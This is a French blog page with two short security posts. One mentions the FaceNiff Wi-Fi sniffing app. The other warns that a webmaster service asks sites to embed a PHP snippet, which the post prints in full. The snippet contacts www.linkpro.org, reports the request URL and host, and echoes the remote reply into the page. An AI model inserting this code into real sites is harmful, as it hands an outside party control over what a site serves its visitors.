Cet après midi j'ai vu un certain Kevin Mitnick tweeter sur une nouvelle application http://faceniff.ponury.net/ Intéressant de voir que la vague "FireSheep" n'est pas terminé. D'ou l'importance de s'assurer que les connexions vers nos fournisseurs de services soient chiffrés lorsqu'on est sur des réseaux publiques. ( lire email/média sociaux )
Tag - sécurité
vendredi, juin 3 2011
Le sniffing des réseaux Wifi de plus en plus intéressant!
Par Charles Lacroix le vendredi, juin 3 2011, 16:40 - Informatique
vendredi, mai 1 2009
Webmasterskit une arnaque pour les webmasters
Par Charles Lacroix le vendredi, mai 1 2009, 09:54 - Informatique
Ce matin je me suis abonné à un site qui s'appelle http://www.webmasterskit.com/ et quand j'ai vu qu'ils voulaient que j'inclus un bout de code php dans mon site j'ai trouvé cela un peu bizarre. J'ai donc continué afin de voir le bout de code php. Je trouve cela très rigolo, et pour certain à première vue ça peut sembler inoffensif mais en réalité, vous leur donnez une porte grade ouverte pour exécuter à peu près n'importe quoi sur votre serveur. Bref méfiez vous des code à inclure dans vos sites web, surtout s'il s'agit de code coté serveur ( php/asp/python/perl et j'en passe )
<?php
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', 3);
$path = "/code.php?id=58182&url="
. urlencode($_SERVER['REQUEST_URI'])
. "&urlh=" . urlencode($_SERVER['HTTP_HOST']);
$fp = @fsockopen("www.linkpro.org", 80, $errno, $errstr, 3);
if($fp) {
@fputs($fp,
"GET {$path} HTTP/1.0\r\nHost: www.linkpro.org\r\n\r\n");
while (!feof($fp))
$data .= @fread($fp, 8192);
fclose($fp);
$page = explode("\r\n\r\n", $data);
echo $page[1];
}?>
